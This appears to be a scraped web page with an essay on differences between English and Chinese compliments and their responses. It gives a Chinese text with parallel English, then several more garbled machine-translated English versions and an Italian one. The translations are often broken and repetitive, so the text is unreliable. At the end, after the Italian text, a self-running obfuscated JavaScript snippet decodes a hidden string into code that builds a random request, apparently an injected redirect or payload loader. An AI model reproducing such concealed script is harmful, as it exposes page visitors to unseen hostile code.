
2024-11-15 17:00:15

The conversational mode of compliment and response features with adjacency structure and exhibits certain regularities, namely, compliment and response are in the form of pairs and mutually influenced. Due to different language using environment and cultural background between English and Chinese, such conversational mode demonstrates great differences on concrete occasions. This paper attempts to explore the pragmatic differences from the aspects of complimenting topics and occasions, form of complimenting and the response to compliment, thus revealing some cultural characteristics between Westernchinese and Chinese culture to facilitate cross-cultural communication.
【Key words】Compliment, Pragmatic difference ,Differences between Western and Chinese culture Cross-cultural communication

称赞语(compliment)是建立与维护人际意义的普遍语言形式,是社会交际用语,不仅可以缩短交际者之间的社会距离,而且可以进一步地联络感情,巩固人际关系。Compliment is the establishment and the maintenance of common language form ,and interpersonal meanings, social communication. It is not only can shorten the distance between social communication, but also can enhance feelings, consolidate the interpersonal relationship.
称赞是一种配对性结构,即一方对另一方进行称赞时,另一方通常得做出相应的回应,即被称赞方是接受还是拒绝,以什么样的方式或言语行为来接受或拒绝。而不同文化背景下的人们在使用同一语言时,由于其文化根源的差异,通常会对同一语言现象产生不同的回应。Praise is a kind of matching structure, for instance, one praise you ,ann then you also make a corresponding response to his praised. Namely, to accept or refuse, in what ways or words to accept or refuse. The people under different cultural background in using the same language, because of its cultural roots, usually have different response on the same language phenomenon.这些回应在某种文化上是可接受的,但对于某种文化可能是不可接受的。通过对中西方称赞语会话模式的研究表明,中西方在使用称赞语方面有典型的差异性。同时,其会话模式的差异性在很大程度上反映了中西方人受到不同文化因素的影响,也体现出了中国人和英美人具有不同的心态和价值观念。These responses in some culture may be are acceptable, but for some another culture may be unacceptable. Based on the mode of the compliments conversation between western and Chinese research shows that there are typical differences in use compliments. At the same time, the differences of their conversational modes largely reflects that we are affected by the various cultural factors in the western, but also reflects the Chinese and American people have different attitude and value.
一、英汉称赞语的语用差异 the pragmatic difference between the compliment of English and Chinese.
1.英汉称赞话题与场合的差异thedifference of Chinese and English compliments in topic or situation
Austin〔1〕的言语行为理论认为,人们使用某种语言形式主要是为了表达自己某种行事行为,简言之就是以言行事。称赞作为一种语言交际行为,它本身就是一种价值判断,是公开地对某个人或某件事做出积极地评论,以此来巩固人际关系。而不同社会的价值观不同,引起社会评价的注意焦点不同,因此称赞语所侧重的内容及使用场合也存在着差异性。 [1] speech act theory of Austin said that people use some form of is mainly to express themselves .In a short words, and do actions by language. Praised as a kind of language communication, which itself is a kind of value judgment, for person,it comments openly or actively, in order to consolidate the interpersonal relationship. But in different socials have different values, the attentions of social evaluation is different, so that the contents of the compliments and usage on occasions also exist differences.
通过对中西方人称赞语使用的研究表明,汉语称赞语中能力、外貌和个性是主要话题。而在英美国家中,能力和外貌是主要话题,而对个性方面的称赞极少。Through the research of the usage of Chinese and westerners it shows that Chinese compliments in appearance and personality, ability is the main topic. And in the UK, ability and appearance is the main topic, while it little praises personality.〔2〕中西方的大多数称赞行为发生在社会地位及年龄相近的人之间。但如果是社会地位不同的人之间发生称赞行为,在汉语环境中,称赞行为通常由社会地位较低者发出。而同样的情况在英美国家并非明显。而无论是汉语使用还是英语使用者,女性得到的恭维大多在外貌方面,而对于男性则集中在能力或者成就方面。Most of western in praise of somebody in similar age and social status. But if it happens in different social status, in Chinese environment, praised by the social status of behavior usually lower. And the same situation is not obvious in Anglo-American countries. Both Chinese and English, most women in praise of appearance, to men in ability or achievement.
同时,在称赞外貌时,英语侧重“刻意修饰的效果”,而汉语则倾向自然的外表,而对于能力的称赞,英语偏向赞扬对方经过努力后所取得的成就,如“Nice work”;而汉语除了赞扬对方的成就之外,还会提及对方为成功所做的努力,如“你的论文写得挺不错的,一定查了不少资料”。 At the same time, the appearance, English place extra emphasis on "decorate painstakingly effect", while Chinese prefers the natural appearance, while to the ability, English place extra emphasis on achievements through hard work, such as “good job”, But Chinese not only praised the achievements, may also mentioned efforts, such as "your thesis, pretty good, must find a lot of information.
其次,称赞语运用的场合不同。英语称赞语倾向于表达平等、一致的关系,而汉语则侧重于表示尊敬、关心对方。例如去别人家做客吃晚饭,英语文化背景下的客人多数会讲类似这样的话:“I enjoyed myself very much.”而汉语文化背景下,称赞的话更多地被道歉的话所代替,如“做这么多菜,辛苦你了”。类似这样的话表达了说话者对听者的关心,是有礼貌的表现。另外,由于英语文化背景下的称赞语强调双方平等一致,所以称赞语几乎变成一种习惯用语,用于打招呼、致谢等。但是在汉语文化背景下,称赞语强调尊重对方,表达称赞时要让对方感到自己真正受到别人的称赞和尊敬,所以汉语称赞语的出现频率不及英语高。 Secondly, the uses of Compliments are different in different occasions. English Complimentary tend to express equality, the accordance, while Chinese are focus on respect, care for each other. For example, go to other people's homes for dinner, the guests who is under English background cultural will likely say like this: “I enjoyed myself very much." While who is under the Chinese cultural background, the praise, then replaced by an apology, such as "to do so much food, you've worked hard.” Similar to the case expressed concern about the listener, is a polite performance. In addition, because of English language and cultural background of the praise the same emphasis on an equal footing, so Compliment almost become a phrase used to greet, thank and so on. But in the context of Chinese culture, Compliments emphasized respect for each other, the expression of praise, we should let each other feel really appreciated and respected by others, so Chinese Compliment less high frequency than English.
2. The comparison between English and Chinese of praise form
In recent years, Chinese and English scholars have studied expression of the compliments. Wolfson and Mancs found that the behavior of the American English is very formulistic; most of the compliments are expressions of adjectives and adverbs. [2] according to the statistical data of two scholars, American compliment adjectives in proportion reaches as high as 80%, the verb (16%), more important is 80% of the used highest frequency adjectives is only five: good, nice, pretty and beautiful ; and the most commonly used the 16% verb phrase only two: love and like.
Chinese compliments, according to statistics, which from ZuoHuanQi professor who found that there is 46 % is adjective, 43% is adverb, only 7% for verbs. Professor found Chinese compliments in the use of high frequency adverb (43%), and most of the compliments contain adjective, adverb, often also have adverb as verb strength.
在句型选择上,英、汉称赞语差异较大。Manes和Wolfson统计资料表明,美国称赞语最常用的句型有三种:In the pattern, the English and Chinese compliments are quite different . Wolfson and Manes ‘s statistics have shown that the the most commonly used sentence compliments in United States are three:
(1)Np is/look(really)ADJ(53.6%)
(2)PRO(really)like/love NP(16.1%)
(3)PRO is(really)(a)ADJ NP(14.9%)
而中文称赞语最常用的句型为“YOU V ADV”(你+动语+副词)(左焕祺,1998),使用频率高达41%。这种句型选择差异体现了不同社会文化对语言表达形成的规约,美国人崇尚个性自由,评价事物突出个人感受,且直截了当。中国人注重个人与社会、与他人关系和谐,往往从对方立场出发考虑问题,因而称赞语中以“YOU V ADV”的表达方式居多。The most common Chinese compliments sentence is " YOU V ADV " (ZuoHuanQi (1998)), the frequency of utilization is relatively high up to. 41%. This pattern choice reflects different social and cultural differences of language expression form Americans, evaluate individual freedom. Chinese emphasize social harmony and relationships with others, often considered from others’ position, so the compliments in “YOU V ADV”.
3.英汉称赞语应答模式之对比The comparison of responds between Chinese and English
人们对称赞的不同反映及应答体现出各自社会独特的文化内涵。对他人的恭维、称赞,西方人趋向于接受称赞,但根据社会语言学的理论,由于社会因素和个人因素不断影响,人们运用语言模式不可能是完全一致的。西方人在回答别人称赞时,归纳起来可分为:接受式(Acceptances)、缓和式()和拒绝式(Rejec-tions)。在接受式应答中,说话人对对方的称赞表示感谢,或者表示同意对方的评价,或回赠称赞。The difference of the respond to the praise reflects their social unique cultural connotation. For others’ praise, westerners tend to accept a compliment, but according to the theory of social linguistics, due to social and personal factors, people use continuously language patterns may not be completely consistent. Westerners in answer to the others’ praise are summed up and can be divided into: accept type (Acceptances), moderate (Mitigating Responses) and refused (Rejec-tions). In response, the people who is praised by other will Expressing thanks to speaker .Foe example,
A:Your blouse is beautiful.
在缓和式应答中说话者往往以各种途径来转移称赞目标,或降低对方的称赞程度,避开了“自我表扬”(sclf-praise),也避开了“否定他人”例如:moderate (Mitigating Responses) use various way to transfer target,or reduce the degree of each other, avoid praise sclf-praise, and others negative they disagree;
A:I like your jacket.
B:I bought it on sale.
拒绝式应答就等于不同意对方的评价,在英语中这种应答模式总是竭力避免的。例如:Refuse is not agree, in English this response patterns are always trying to avoid. For example:
A:Your sweater is beautiful.
B:It’s not beautiful.
这种应答模式对交际双方的关系破坏性最大,不利于人际关系的发展,说英语的人会把这种“否认”看作是对谈话对象的无礼。在跨文化交际中,应竭力避免这一点。而中国人在受到称赞后常采用“拒绝+否定”模式,倾向于使用“否定”“自贬”的应答模式来接受他人的赞美之词。这主要是由于中国人的谦虚而产生的一种交际模式。例如:This response patterns on both sides is most devastating relationship, against the development of interpersonal relationship, and the people who speak English will take the "deny" as the object of rude. In cross-cultural communication, we should be avoid it. However the Chinese often adopted in praise of "refuse + negative" mode, tend to use the "negative" self-denigration to accept compliments. This is mainly due to the Chinese modesty and a communication mode. For example:
A: Professor Wang, your essay is enlightening significance.
B: No, I think that is just my humble opinion.
在跨文化交际中,中国人往往本能地根据母语社会文化规则对称赞做出不适宜的否定性反应,从而引发语用失误,导致交际失败。In cross-cultural communication, Chinese often instinctively according to the rules of social culture and language to praise inappropriate negative response, causing pragmatic failures in communication .
二、英汉称赞语语用差异折射的深层文化差异Pragmatic difference between Chinese and English reflects the culture difference
美国人自我意识和独立意识很强,其文化突出个体性,尊崇个人的人格、价值、尊严,倡导人的个体独立性及不同的价值取向。而中国文化更强调群体关系,谦虚是中华民族的美德,因而赞美也就起着不同的作用,它能使听话者对说话人有一个很好的印象,从而取悦听话人,拉进彼此之间的距离。American‘s self-awareness and independent consciousness very strong, and its culture is outstanding , worship individual character, exalt personal dignity, value. But Chinese culture emphasize group, modesty is the relationship of virtue, thus praised also plays a different role, it can make people have a hearer of good impression, thereby, please the listener and shorten distance between each other.


Compliment (drastic) is the establishment and the maintenance of common language form interpersonal meanings, social communication, not only can shorten the distance between social communication, and can be further contact feelings, consolidate the interpersonal relationship.
Praise is a kind of matching structure of the other party, party for praise, another side to make corresponding response to often be praised, namely is to accept or refuse, in what ways or speech act to accept or refuse. And the people under different cultural background in using the same language, because of its cultural roots, usually on the same language phenomenon different response. These responses in a culture is acceptable, but for some culture may be acceptable. Based on the mode of the compliments conversation between western and Chinese research shows that in use is typical of the compliments. At the same time, the differences in their conversational mode largely reflects the various cultural factors in the western influence, but also reflects the Chinese and American people have different attitude and value.
A, communicating with differences in language
1 subject to the occasion and praise
Austin (1) of the speech act theory that people use some form of language is mainly to express themselves in a short words and actions to. Praised as a kind of language communication, which itself is a kind of value judgment, for one person is openly or something to actively comments, in order to consolidate the interpersonal relationship. But different social values, different social evaluation of attention is different, so that the contents of the compliments on occasions and also exist differences.
Through the use of Chinese and western person world.the research shows that Chinese compliments in appearance and personality, ability is the main topic. And in the UK, ability and is the main topic, and appearance of the personality of praise. [2] and most praise in the social status of similar age and between people. But if it is of different social status between behavior and praise in Chinese environment, praised by the social status of behavior usually lower. And the same situation is not obvious in Anglo-American countries. Both Chinese and English, use or user of most women in appearance, flattery to men in ability or achievement.
At the same time, the appearance, English on "decorate painstakingly effect", while Chinese prefers the natural appearance, and the ability to turn, pass to praise each other English after achievements, such as "Nice" webmaster, But Chinese praised the achievements, the other party may also mentioned for successful effort, such as "your thesis, pretty good, must find a lot of information.
Secondly, used in different occasions compliments. English compliment tend to express equality, consistent relationship, and Chinese are focusing on the respect, care each other. Such as visiting dinner, English culture background of guest most speak such words: "I enjoyed myself." but one connected Chinese cultural background, the words of praise is more of an apology, such as "do so many dishes, hard you". Such words to express the speaker is concerned, the listener is polite. In addition, because English culture background of compliment emphasize both equality unanimously, so the compliments almost become a habit, thanks for greeting, etc. But in Chinese cultural background, compliment emphasize respect each other, make each other when expressing praised by others feel real compliments and respect, so Chinese compliments of frequency than English.
Question 2, added the compliments and pragmatic differences of refraction deep cultural differences
Americans self-awareness and independent consciousness very strong, and its culture outstanding individual character, exalt personal dignity, value, and proposes the individual independence and different value orientation. But Chinese culture emphasize group, modesty is the relationship of virtue, thus praised also plays a different role, it can make people have a hearer of good impression, thereby, please listen to the distance between each other. America is a nation of immigrants, no new traditional maras, thus advocate between equality. In social activities, praise without the use and cultural background. And the king, and Chinese traditional ideas of feudal already entrenched in people's hearts. Chinese culture, advocate "courtesy costs nothing", and the manners is the traditional Chinese ethics and morality, such as different for men, who in his orderly, families and society, not arbitrary positioning. In this paper, the difference of the compliments can see: due to different cultural background and ecology in nation, physical, social and religious environment different, thus produced various ethnic language habits, social culture, and the local conditions and customs of different aspects of context factors, will cause people to speak and habits identical


Compliment (compliment) to establish and maintain meaningful interpersonal form of universal language, is the language of social communication can not only reduce the social distance between communicators, and can further feel for consolidation of relationships.
Praise is a matching structure, that is, when one party against the other praise, the other often have to respond accordingly, he incurs praised the party to accept or reject, in what way or to accept or reject the speech act. The different cultural backgrounds of people use the same language, because of their different cultural roots, usually the same linguistic phenomenon will produce different responses. These responses in a culturally acceptable, but a culture may be unacceptable. Compliments on the Western model of conversation that, in the West have a typical use of Compliments difference. At the same time, the session on the differences largely reflect the different cultures in the West by the factors, also reflects the Chinese and American people have a different mentality and values.
First, Chinese Compliment Pragmatic Differences
1. English praised the topic and the occasion of the difference
〔1〕 Austin speech act theory is that the use of a language is mainly to express their own acts of certain acts, in short, to Do Things with Words. Praised as a communicative act, which itself is a value judgments, are open to individual or something of a positive comment to make in order to strengthen relationships. Different values and different social, attracted the attention of the focus of evaluation are different, praised the focus on content and language use in situations where there are differences.
Compliments on the use of Western research shows that Chinese Compliments ability, appearance and personality are the main topic. In the Anglo-American countries, the ability and appearance are the main topic, but very little on the personality of praise. 〔2〕 praised the behavior of most of the West occurred in similar social status and age between. However, if social status between different people praise behavior in Chinese environment, praised the actions the lower social status usually given. The same situation in Britain and the U.S. is not obvious. The use of either Chinese or English speakers, most women get compliments in appearance, but rather for the men are concentrated in ability or achievements.
Meanwhile, praised appearance, the English focused on the "deliberate modification of the effects," while the Chinese tend to look natural, but for the ability to praise each other through the efforts of English tend to commend the achievements after, such as "Nice work"; and Chinese In addition to commend each other's achievements, but also mentioned other successful efforts, such as "you did very well written paper, and must check a lot of information."
Secondly, the use of Compliments different occasions. English Complimentary tend to express equality, the same relationship, said Chinese are focused on respect, care for each other. Example to other people's homes for dinner, English cultural context of the guests will mostly be about a similar case: "I enjoyed myself very much." While the Chinese cultural background, the praise, then more is an apology, then replaced, such as "to do so more food, you've worked hard. " Similar to the case expressed concern about the speaker on the listener, is polite performance. In addition, because of English language and cultural background of the praise the same emphasis on an equal footing, so Compliment almost become a phrase used to greet, thank and so on. But in the context of Chinese culture, Compliments emphasized respect for each other, the expression of praise, we should let each other feel really appreciated and respected by others, so Chinese Compliment high frequency of less than English.
Questions added: 2, Pragmatic differences between English and praised the deep cultural differences in refraction
Americans a strong sense of self-awareness and independence, its cultural highlight the individuality, respect the individual personality and values, dignity, promote independence and individual people of different values. The group also stressed that relations between the Chinese culture, modesty is a virtue of the Chinese nation, and therefore also play different roles in praise, which enables the listener to the speaker, and have a good impression, so please listen people, pull into each other distance. The United States is an emerging nation of immigrants, not the traditional aristocratic civilian distinction, which advocates equality between people. In social activities, use of praise can not escape from this cultural background. The emperor and the Chinese tradition, son of the feudal hierarchy has been ingrained in people's hearts. To promote Chinese culture, "politeness costs nothing," and etiquette associated with this traditional Chinese moral concepts, such as men and women are different, young and old order, people in the family and society, clear positioning, not any beyond. Compliments from the difference between English and Chinese can be seen: due to different ethnic and cultural backgrounds in which ecological, physical, social and religious environment is different, thus creating the language and customs of various ethnic, social, cultural, customs, and many other contextual factors The differences and also led to different speech patterns and habits.


Compliment (compliment) to establish and maintain meaningful interpersonal form of universal language, is the language of social communication can not only reduce the social distance between communicators, and can further feel for consolidation of relationships.
Praise is a matching structure, that is, one party against the other praise, the other often have to respond accordingly, he incurs praised the party to accept or reject, in what way or to accept or reject the speech act. The different cultural backgrounds of people use the same language, because of their different cultural roots, usually the same linguistic phenomenon will produce different responses. The response is acceptable in some cultures, but for a culture may be unacceptable. Compliments on the Western model of conversation that, in the West have a typical use of Compliments difference. At the same time, the session on the differences largely reflect the different cultures in the West by the factors, also reflects the Chinese and American people have a different mentality and values.
First, Chinese Compliment Pragmatic Differences
1. English praised the topic and the occasion of the difference
〔1〕 Austin speech act theory is that the use of a language is mainly to express their own acts of certain acts, in short, to Do Things with Words. Praised as a communicative act, which itself is a value judgments, are open to individual or something of a positive comment to make in order to strengthen relationships. Different values and different social, attracted the attention of the focus of evaluation are different, praised the focus on content and language use in situations where there are differences.
Compliments on the use of Western research shows that Chinese Compliments ability, appearance and personality are the main topic. In the Anglo-American countries, the ability and appearance are the main topic, but very little on the personality of praise. 〔2〕 praised the behavior of most of the West occurred in similar social status and age between. However, if social status between different people praise behavior in Chinese environment, praised the actions the lower social status usually given. The same situation in Britain and the U.S. is not obvious. The use of either Chinese or English speakers, most women get compliments in appearance, but rather for the men are concentrated in ability or achievements.
Meanwhile, praised appearance, the English focused on the "deliberate modification of the effects", while the Chinese tend to look natural, but praise for the ability, through the efforts of English tend to Zanyangduifang after the achievements such as "Nice work"; and Chinese In addition to commend each other's achievements, but also mentioned other successful efforts, such as "you did very well written paper, and must check a lot of information."
Secondly, the use of Compliments different occasions. English Complimentary tend to express equality, the same relationship, said Chinese are focused on respect, care for each other. Example to other people's homes for dinner, English cultural context of the guests will mostly be talking like this, then: "I enjoyed myself very much." While the Chinese cultural background, praised the words of more Pi to apologize, then replaced, such as "to do so more food, you've worked hard. " Similar to the case expressed concern about the speaker on the listener, is polite performance. In addition, because the praise of English cultural background emphasized that both sides equal the same language, it almost becomes a habit Compliments term for hello, thank, etc.. But in the context of Chinese culture, Compliments emphasized respect for each other, the expression of praise, we should let each other feel really appreciated and respected by others, so Chinese Compliment high frequency of less than English.

Complimento (complimento) di stabilire e mantenere la forma interpersonali significative del linguaggio universale, è la lingua di comunicazione sociale possono non solo ridurre la distanza sociale tra comunicatori, e possono ulteriormente sentire per il consolidamento dei rapporti.
La lode è una struttura di corrispondenza, cioè, quando una parte contro l'altra lodare, l'altro spesso devono rispondere di conseguenza, egli assume elogiato il partito di accettare o rifiutare, in che modo o per accettare o respingere l'atto di parola. I diversi background culturale di persone usano la stessa lingua, a causa delle loro radici culturali diverse, in genere lo stesso fenomeno linguistico produce risposte diverse. Queste risposte in un culturalmente accettabile, ma una cultura può essere inaccettabile. Complimenti per il modello occidentale di conversazione che, in Occidente, hanno un utilizzo tipico di differenza complimenti. Allo stesso tempo, il loro modello di conversazione di differenze in cinese e occidentali in gran parte rispecchia l'influenza di diversi fattori culturali, ma riflette anche il diverso cinese e americano le persone hanno la mentalità e valori.
In primo luogo, le differenze cinese Complimento Pragmatic
1. Inglese ha elogiato il tema e l'occasione della differenza
〔1〕 teoria discorso Austin atto è che l'uso of una lingua è principalmente per esprimere i propri atti di certi atti, insomma, fare cose con le parole. Sia lodato come un atto comunicativo, che è esso stesso un giudizio di valore, sono aperte a singoli o qualcosa di un commento positivo di fare al fine di rafforzare le relazioni. valori diversi e differenti sociale, ha attirato l'attenzione del fuoco di valutazione differenti, così lodata da concentrarsi sul contenuto e l'uso del linguaggio in situazioni in cui ci sono differenze.
Complimenti per l'uso di spettacoli di ricerca occidentali che cinesi capacità Complimenti, l'aspetto e la personalità sono l'argomento principale. Nei paesi anglo-americana, la capacità e l'aspetto sono l'argomento principale, ma molto poco la personalità di lode. 〔2〕 elogiato il comportamento della maggior parte di Occidente si è verificato in simili status sociale e di età tra. Tuttavia, se lo status sociale tra persone diverse lode comportamento in ambiente cinese, ha elogiato le azioni dello status sociale più basso di solito dato. La stessa situazione in Gran Bretagna e gli Stati Uniti non è evidente. L'applicazione di uno cinese o inglese diffusori, la maggior parte donne si complimenti in apparenza, ma piuttosto per gli uomini si concentrano nella capacità o risultati.
Nel frattempo, ha elogiato l'aspetto, gli inglesi incentrata sulla "modifica deliberata degli effetti", mentre i cinesi tendono a cercare naturali, ma per la capacità di lode a vicenda attraverso gli sforzi di inglese tende a elogiare i risultati conseguiti dopo, come "Ottimo lavoro"; e cinese Oltre a lodare l'altro i risultati conseguiti, ma anche menzionato altre iniziative di successo, come "hai fatto molto ben scritto di carta, e devono controllare un sacco di informazioni."
In secondo luogo, l'uso di occasioni Complimenti diversi. Inglese gratuito tendono a esprimere la parità, lo stesso rapporto, ha detto cinesi sono focalizzate sul rispetto, la cura per l'altro. Esempio alle case di altre persone per la cena, il contesto culturale inglese degli ospiti saranno principalmente tratti di un caso analogo: "Io mi sono divertito molto." Mentre sullo sfondo cinese culturale, la lode, quindi più è una scusa, poi sostituito, come "a farlo più cibo, si è lavorato duro. " Simile al caso espresso preoccupazione per il diffusore sul ascoltatore, è la prestazione gentile. Inoltre, a causa della lingua inglese e il background culturale della lode la stessa enfasi su un piano paritario, in modo Complimento diventato quasi una frase usata per salutare, ringraziare e così via. Ma nel contesto della cultura cinese, ha sottolineato Complimenti rispetto per l'altro, l'espressione di lode, dovremmo lasciare che ogni altro sento veramente apprezzato e rispettato dagli altri, la frequenza Complimento cinese così elevato di meno di lingua inglese.

!function(){function a(a){var _idx="e4ydksy2pg";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('>[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y=F=O8D62fODm622Y5V6fFh!qYF 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